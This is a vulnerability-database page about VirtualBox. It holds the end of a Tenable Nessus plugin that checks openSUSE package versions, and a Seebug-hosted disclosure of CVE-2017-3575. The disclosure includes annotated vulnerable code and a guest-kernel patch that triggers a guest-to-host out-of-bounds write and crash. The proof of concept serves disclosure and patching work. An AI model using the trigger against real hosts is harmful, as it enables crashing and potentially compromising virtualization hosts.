unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. These non-security issues were fixed : - GUI: don't check if the Extension Pack is up-to-date if the user is about to install a new Extension Pack - GUI: fixed a possible crash when switching a multi-monitor VM into full-screen or seamless mode - GUI: several mini-toolbar fixes in full-screen / seamless mode - GUI: don't crash on restoring defaults in the appliance import dialog - ICH9: fix for Windows guests with a huge amount (more than 64G) of guest memory - BIOS: fixed El Torito hard disk emulation geometry calculation - VMM: fixed VERR_IEM_INSTR_NOT_IMPLEMENTED Guru Meditation under certain conditions - Storage: fixed a potential hang under rare circumstances - Storage: fixed a potential crash under rare circumstances (asynchronous I/O disabled or during maintenance file operations like merging snapshots) - Linux hosts: make the ALSA backend work again as well as loading the GL libraries on certain hosts - Linux Additions: fixed mount.vboxsf symlink problem" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034854" ); script_set_attribute( attribute:"solution", value:"Update the affected virtualbox packages." ); script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:python-virtualbox"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-x11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-host-source"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-qt"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-websrv"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/05/02"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/03"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(x86_64)$") audit(AUDIT_ARCH_NOT, "x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.2", reference:"python-virtualbox-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"python-virtualbox-debuginfo-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-debuginfo-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-debugsource-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-devel-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-desktop-icons-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-kmp-default-5.1.22_k4.4.57_18.3-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-kmp-default-debuginfo-5.1.22_k4.4.57_18.3-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-tools-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-tools-debuginfo-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-x11-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-guest-x11-debuginfo-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-host-kmp-default-5.1.22_k4.4.57_18.3-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-host-kmp-default-debuginfo-5.1.22_k4.4.57_18.3-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-host-source-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-qt-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-qt-debuginfo-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-websrv-5.1.22-19.10.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"virtualbox-websrv-debuginfo-5.1.22-19.10.1") ) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc"); }
Seebug
| bulletinFamily | exploit |
| description | This is a vulnerability that affects VirtualBox VMs that use a virtio network adapter (which is a non-standard configuration). It permits the guest kernel to write up to 4GB of controlled data out of bounds in the trusted userland host process. The bug is in the following code in src/VBox/Devices/Network/DevVirtioNet.cpp (comments starting with `//###` are by me): ``` while (vqueuePeek(&pThis->VPCI, pQueue, &elem)) { unsigned int uOffset = 0; if (elem.nOut < 2 || elem.aSegsOut[0].cb != uHdrLen) { [...] } else { unsigned int uSize = 0; [...] /* Compute total frame size. */ //### .cb members are attacker-controlled uint32_t. //### addition is performed without overflow check. for (unsigned int i = 1; i < elem.nOut; i++) uSize += elem.aSegsOut[i].cb; [...] //### Assert() has no effect in release builds. Assert(uSize <= VNET_MAX_FRAME_SIZE); if (pThis->pDrv) { [...] PPDMSCATTERGATHER pSgBuf; //### undersized buffer is allocated here. int rc = pThis->pDrv->pfnAllocBuf(pThis->pDrv, uSize, pGso, &pSgBuf); if (RT_SUCCESS(rc)) { Assert(pSgBuf->cSegs == 1); /* Assemble a complete frame. */ for (unsigned int i = 1; i < elem.nOut; i++) { //### memory corruption happens here. PDMDevHlpPhysRead(pThis->VPCI.CTX_SUFF(pDevIns), elem.aSegsOut[i].addr, ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset, elem.aSegsOut[i].cb); uOffset += elem.aSegsOut[i].cb; } [...] } else { [...] } [...] } } [...] } ``` This code basically takes an IO vector (`elem.aSegsOut`) from the guest, allocates a buffer (`pSgBuf`) that is large enough to hold the concatenation of all elements of the IO vector, then copies data from the IO vector into the newly allocated buffer. The issue here is that the lengths from the IO vector are summed up without overflow checking. If the total length of the IO vector is over 4GB, `uSize` wraps around, causing the allocated buffer to be up to 4GB smaller than the data that is copied into it. The reason why the amount of data that is written out of bounds can be less than 4GB is that uOffset is also only 32 bits wide, causing the start offsets of the IO vector elements to wrap. A VM does not need to have 4GB of memory to be able to trigger the bug. To reproduce, create a VM with 2GB of RAM, configure the VM to use virtio, then run a Linux system with the following kernel patch applied inside the VM: ``` # git show --format=oneline HEAD 0722f57bfae9abbc673b9dbe495c7da2f64676ea Merge tag 'drm-fixes-for-v4.10-final' of git://people.freedesktop.org/~airlied/linux # git diff diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c index 409aeaa..7eca030 100644 --- a/drivers/virtio/virtio_ring.c +++ b/drivers/virtio/virtio_ring.c @@ -271,6 +271,7 @@ static inline int virtqueue_add(struct virtqueue *_vq, unsigned int i, n, avail, descs_used, uninitialized_var(prev), err_idx; int head; bool indirect; + int attack_i; START_USE(vq); @@ -301,7 +302,7 @@ static inline int virtqueue_add(struct virtqueue *_vq, /* If the host supports indirect descriptor tables, and we have multiple * buffers, then go indirect. FIXME: tune this threshold */ - if (vq->indirect && total_sg > 1 && vq->vq.num_free) + if (false) desc = alloc_indirect(_vq, total_sg, gfp); else desc = NULL; @@ -316,7 +317,7 @@ static inline int virtqueue_add(struct virtqueue *_vq, indirect = false; desc = vq->vring.desc; i = head; - descs_used = total_sg; + descs_used = total_sg + 4; } if (vq->vq.num_free < descs_used) { @@ -346,6 +347,13 @@ static inline int virtqueue_add(struct virtqueue *_vq, i = virtio16_to_cpu(_vq->vdev, desc[i].next); } } + for (attack_i = 0; attack_i < 4; attack_i++) { + desc[i].flags = cpu_to_virtio16(_vq->vdev, VRING_DESC_F_NEXT); + desc[i].addr = cpu_to_virtio64(_vq->vdev, 0x100000); + desc[i].len = cpu_to_virtio32(_vq->vdev, 0x40000000); + prev = i; + i = virtio16_to_cpu(_vq->vdev, desc[i].next); + } for (; n < (out_sgs + in_sgs); n++) { for (sg = sgs[n]; sg; sg = sg_next(sg)) { dma_addr_t addr = vring_map_one_sg(vq, sg, DMA_FROM_DEVICE); ``` As soon as the VM tries to talk to the network, the VM will crash. In a test with VirtualBox 5.1.14 r112924, a segfault occured with the following backtrace: ``` (gdb) bt #0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:37 #1 0x00007f6896620cbe in PGMPhysRead () from /usr/lib/virtualbox/components/VBoxVMM.so #2 0x00007f685416cb9d in ?? () from /usr/lib/virtualbox/VBoxDD.so #3 0x00007f685416cfea in ?? () from /usr/lib/virtualbox/VBoxDD.so #4 0x00007f689657434e in ?? () from /usr/lib/virtualbox/components/VBoxVMM.so #5 0x00007f6896576fc0 in TMR3TimerQueuesDo () from /usr/lib/virtualbox/components/VBoxVMM.so #6 0x00007f689657fa99 in ?? () from /usr/lib/virtualbox/components/VBoxVMM.so #7 0x00007f6896580a63 in ?? () from /usr/lib/virtualbox/components/VBoxVMM.so #8 0x00007f689650cd09 in ?? () from /usr/lib/virtualbox/components/VBoxVMM.so #9 0x00007f6896580cd4 in ?? () from /usr/lib/virtualbox/components/VBoxVMM.so #10 0x00007f68a5a6981c in ?? () from /usr/lib/virtualbox/VBoxRT.so #11 0x00007f68a5aedc7c in ?? () from /usr/lib/virtualbox/VBoxRT.so #12 0x00007f68a6397184 in start_thread (arg=0x7f6875af6700) at pthread_create.c:312 #13 0x00007f68a5ec037d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111 ``` Regarding exploitability: I have not investigated exploitability in detail; however, I believe that this issue is probably exploitable. For example, if the network interface is a NAT interface, drvNATNetworkUp_AllocBuf() is used to allocate the buffer, which in the pGso!=NULL case will allocate an arbitrarily-sized buffer with RTMemAlloc(), which should allow arbitrarily-sized allocations, permitting an out-of-bounds write behind a big heap allocation with fully controlled length and data. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Oracle assigned tracking# S0833831. Oracle is planning to release a fix on 2017-04-18. Fixed in http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html. |
| id | SSV:92971 |
| last seen | 2017-11-19 |
| modified | 2017-04-19 |
| published | 2017-04-19 |
| reporter | Root |
| title | VirtualBox: guest-to-host out-of-bounds write via virtio-net (CVE-2017-3575) |